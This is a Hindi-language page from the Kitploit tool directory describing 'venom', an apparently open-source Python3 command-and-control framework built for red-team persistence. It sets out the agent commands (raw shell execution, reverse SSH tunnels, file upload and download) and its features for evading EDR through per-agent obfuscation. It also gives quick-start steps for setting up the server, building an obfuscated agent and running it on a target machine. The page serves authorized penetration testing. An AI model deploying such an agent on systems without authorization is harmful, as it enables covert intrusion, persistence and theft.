Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
venom — वेनम C2 एक डिपेंडेंसी-मुक्त Python3 कमांड और कंट्रोल फ्रेमवर्क है जो रेडटीम पर्सिस्टेंस के लिए है। | Kitploit
उपकरण/GitHubGitHub/boku7/venom
एन्क्रिप्शन/डिक्रिप्शन उपकरणपेलोड जनरेशनस्थायित्व तंत्रपार्श्व आंदोलनशेलकोडपोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
GitHubboku7/venom

venom

वेनम C2 एक डिपेंडेंसी-मुक्त Python3 कमांड और कंट्रोल फ्रेमवर्क है जो रेडटीम पर्सिस्टेंस के लिए है।

436759 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

वेनम C2

वेनम C2 एक निर्भरता-मुक्त Python3 कमांड और कंट्रोल फ्रेमवर्क है जो रेड टीम निरंतरता के लिए बनाया गया है, और पैकेज स्थापित किए बिना सिस्टम पर चलने के लिए डिज़ाइन किया गया है। इसमें एक Flask टीम सर्वर, एक Electron ऑपरेटर GUI, और एक एकल-फ़ाइल Python एजेंट शामिल है जो कॉन्फ़िगर करने योग्य AES-एन्क्रिप्टेड JSON संदेशों का उपयोग करके HTTP/HTTPS पर संचार करता है। इसका उपयोग कमांड निष्पादित करने, फ़ाइलें प्रबंधित करने, पहुँच बनाए रखने और समझौता किए गए सिस्टम से SSH रिवर्स टनल बनाने के लिए करें।

पृष्ठभूमि

जब हम नेटवर्क विशेषाधिकारों को बढ़ा रहे थे, तब हम कई उत्पादन प्रणालियों पर पहुंचे जो असामान्य डिस्ट्रो और आर्किटेक्चर चला रही थीं। हम निरंतरता स्थापित करना चाहते थे, लेकिन हमारे उपकरणों और तकनीकों का शस्त्रागार काम नहीं करता था। इसके अलावा, कुछ लक्षित प्रणालियों पर EDR चल रहा था।

ये उत्पादन प्रणालियाँ थीं, इसलिए हम पैकेज स्थापित नहीं करना चाहते थे। हमें एक C2 एजेंट की आवश्यकता थी जो बिना निर्भरता के चले। सिस्टम पर Python3 स्थापित था, इसलिए मैंने मध्य-अभियान में वेनम C2 बनाया; एक निर्भरता-मुक्त Python3 C2 एजेंट जो बस काम करता है।

हम तैयार C2 एजेंटों का उपयोग नहीं करना चाहते थे, क्योंकि इस जोखिम से कि वे ब्लू टीम द्वारा पहचाने जा सकते हैं। आधुनिक EDR को बायपास करने के लिए अद्वितीय कोड ही राजा है

चूंकि कई सिस्टम थे, हमने प्रति एजेंट अद्वितीय अस्पष्टीकरण, नामकरण, फ़ाइल सिस्टम प्लेसमेंट, अलग-अलग नेटवर्क कॉलबैक डोमेन और अद्वितीय नेटवर्क पथ अनुरोधों को स्वचालित किया।

मैंने इसे Venom नाम दिया क्योंकि मेरा बेटा स्पाइडर-मैन के Venom खलनायक को पसंद करता है। साथ ही अजगर एक सांप है और अच्छे सांपों में विष होता है, इसलिए मुझे लगा कि यह एक अच्छा फिट है।

वेनम C2 का भविष्य

कोई नहीं है।

यह सिर्फ एक एक बार का C2 प्रोजेक्ट था जो मैंने मध्य-अभियान में किया था। इसे लक्ष्य वातावरण में स्थिर और विश्वसनीय बनाने में लगभग 2 दिन का विकास लगा। इसने अपना काम किया, हमें अभियान के शेष 6 हफ्तों के लिए नेटवर्क में निरंतरता दी। मैं इस प्रोजेक्ट को विकसित या उपयोग करने की योजना नहीं बना रहा हूँ, इसलिए मुझे लगा कि यह सार्वजनिक रूप से जारी करने के लिए एक अच्छा उम्मीदवार है।

अन्यथा यह केवल devNULL में खो जाता...

devnull

वेनम C2 घटक और विशेषताएँ

सर्वर

  • Python3 Flask
  • कई ऑपरेटरों का समर्थन करने वाला टीम सर्वर
  • कमांड इतिहास सहेजता है
  • एजेंट कॉन्फ़िगर करने के लिए स्क्रिप्ट
  • एजेंटों को अस्पष्ट करने के लिए स्क्रिप्ट
  • एजेंट कनेक्शन प्रबंधित करता है
  • GUI क्लाइंट के साथ संचार के लिए API
  • बड़े ऐरे से यादृच्छिक चयन के साथ कस्टम प्रोफाइल:
    • C2 संदेश पैरामीटर नाम
    • यादृच्छिक हेडर
    • स्केलेबल मान प्रकारों के साथ यादृच्छिक JSON विशेषताएँ

क्लाइंट GUI

  • Electron
  • Linux, macOS, Windows पर काम करता है
  • GUI Loki GUI का एक पतला संस्करण है

एजेंट

  • निर्भरता के बिना Python3
  • संदेश कॉन्फ़िगर करने योग्य AES कुंजियों का उपयोग करके एन्क्रिप्ट किए जाते हैं
  • सभी संदेश JSON POST अनुरोधों के रूप में भेजे जाते हैं
  • बड़े ऐरे से यादृच्छिक चयन के साथ कस्टम प्रोफाइल:
    • URI आधार पथ (रिवर्स प्रॉक्सी रूटिंग स्थापित करने के लिए उपयोगी)
    • प्रत्येक एजेंट फ़ंक्शन के लिए कई URI पथ
    • C2 संदेश पैरामीटर नाम
    • उपयोगकर्ता एजेंट
    • यादृच्छिक हेडर
    • स्केलेबल मान प्रकारों के साथ यादृच्छिक JSON विशेषताएँ

एजेंट कमांड

[11-04-2025 11:31 AM MST] admin help

root@kitploit:~
help     : Display this help menu
ls       : List directory contents
pwd      : Show current working directory
cd       : Change directory
cat      : Display file contents
mv       : Move/rename files or directories
cp       : Copy files or directories
mkdir    : Create directory
rmdir    : Remove empty directory
write    : Write content to file
chmod    : Change file permissions
rm       : Remove (delete) files
shell    : Execute raw shell command
sleep    : Make agent sleep with optional jitter
sshrev   : Create reverse SSH tunnel
kill     : Terminate agent process
upload   : Upload a file from your local operator box to the remote agent box
download : Download a file from remote agent box to local operator box

त्वरित आरंभ

1. अपने सर्वर पर कोड प्राप्त करें

root@kitploit:~
git clone https://github.com/boku7/venom 
cd venom

2. सर्वर आवश्यकताएँ स्थापित करें (Python 3)

root@kitploit:~
pip3 install -r server/requirements.txt

3. सर्वर चलाएँ

root@kitploit:~
cd server
python3 server.py --help
python3 server.py
  • पहली बार शुरू करने पर, एडमिन उपयोगकर्ता नाम और पासवर्ड कंसोल पर मुद्रित होता है। कॉपी करें और क्लाइंट को सर्वर से प्रमाणित करने के लिए स्टोर करें।
  • या अपना स्वयं का सेट करें: python3 server.py --adduser <USERNAME> <PASSWORD>

4. वर्कस्टेशन पर क्लाइंट चलाएँ

क्लाइंट UI को अपने वर्कस्टेशन पर चलाएँ (सर्वर पर नहीं)। इसे सर्वर तक पहुँचना होगा।

root@kitploit:~
cd ../client
npm install
npm run start

क्लाइंट खोलें, Config पर जाएँ, और सर्वर क्रेडेंशियल दर्ज करें।

सुरक्षा

सर्वर का क्लाइंट API आधार पथ /api/ है। /api/ को सार्वजनिक इंटरनेट पर उजागर न करें। VPN या सख्त फ़ायरवॉल/रिवर्स-प्रॉक्सी नियमों का उपयोग करें ताकि केवल विश्वसनीय क्लाइंट ही उस तक पहुँच सकें।

5. एजेंट बनाएँ

server निर्देशिका से:

root@kitploit:~
python3 agent_create.py -H <server_host> -P <server_port> [-http]

6. एजेंट को अस्पष्ट करें

server निर्देशिका से:

root@kitploit:~
python3 agent_obfuscate.py agents/<generated_agent_file>.py

7. एजेंट चलाएँ

जिस लक्ष्य कंप्यूटर को आप नियंत्रित करना चाहते हैं, उस पर चलाया जाना चाहिए।

root@kitploit:~
python3 /Users/bobby/venom/server/obfuscate/output/obfuscated_agent_20251104_110902.py
टूल डाउनलोड करें